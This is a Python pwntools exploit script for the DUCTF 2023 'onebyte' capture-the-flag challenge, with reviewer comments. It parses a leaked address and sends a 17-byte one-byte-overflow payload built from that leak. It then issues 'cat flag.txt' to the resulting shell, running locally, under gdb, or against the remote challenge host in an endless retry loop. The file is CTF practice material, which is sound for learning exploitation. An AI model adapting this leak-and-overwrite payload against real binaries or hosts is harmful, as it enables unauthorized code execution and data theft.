from pwn import *
import os
# NOTE(review): pwntools processes PWNLIB_* environment variables while `pwn`
# is being imported, so assigning this after the import above probably does
# not change this process's log level -- confirm. The in-process equivalent
# would be `context.log_level = "debug"`.
os.environ["PWNLIB_DEBUG"] = "1"

# GDB script handed to gdb.debug() by start(). It removes LINES and COLUMNS
# from the debuggee's environment, follows the child across a fork, sets a
# breakpoint at main+93 and then continues.
gs = """
unset env LINES
unset env COLUMNS
set follow-fork-mode child
br *main+93
c
"""

# The target binary is expected in the current working directory.
elf = ELF(f"{os.getcwd()}/onebyte")
def start():
    """Return a pwntools tube connected to the target.

    The mode is picked from pwntools' magic command-line arguments:
    GDB launches the local binary under gdb with the `gs` script, REMOTE
    connects to the hard-coded challenge host and port, and with neither
    set the local binary is started as a plain process. GDB takes
    precedence when both are given.
    """
    if args.GDB:
        tube = gdb.debug(elf.path, gs)
    elif args.REMOTE:
        tube = remote("2023.ductf.dev", 30018)
    else:
        tube = process(elf.path)
    return tube
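# Attempt loop: each pass opens a fresh tube with start(), reads the address
# the target prints, sends one payload and prints whatever comes back.
# NOTE(review): there is no exit condition (the author's `break` was left
# commented out), so this runs until interrupted; in REMOTE mode that means
# one new connection to the challenge host per pass.
while True:
    io = start()
    try:
        # The banner has the form "Free junk: 0x<hex>\n"; drop the "0x"
        # prefix and the trailing newline before parsing the hex digits.
        io.recvuntil(b"Free junk: ")
        x = io.recvline()
        x = int(x[2:-1], 16)

        print(hex(x))

        print(io.recvuntil(b"Your turn: "))
        # Payload: four little-endian 32-bit copies of (leak + 70) followed
        # by a single extra byte 0x80, 17 bytes in total.
        # NOTE(review): the meaning of the +70 offset and of the last byte
        # is not visible in this file -- confirm against the binary.
        io.send(p32(x + 70) * 4 + b"\x80")
        io.sendline(b"cat flag.txt")
        print(io.recvall(timeout=2))
    finally:
        # Close the tube on every pass, including when a receive raises,
        # so processes and sockets from earlier passes are not left open.
        io.close()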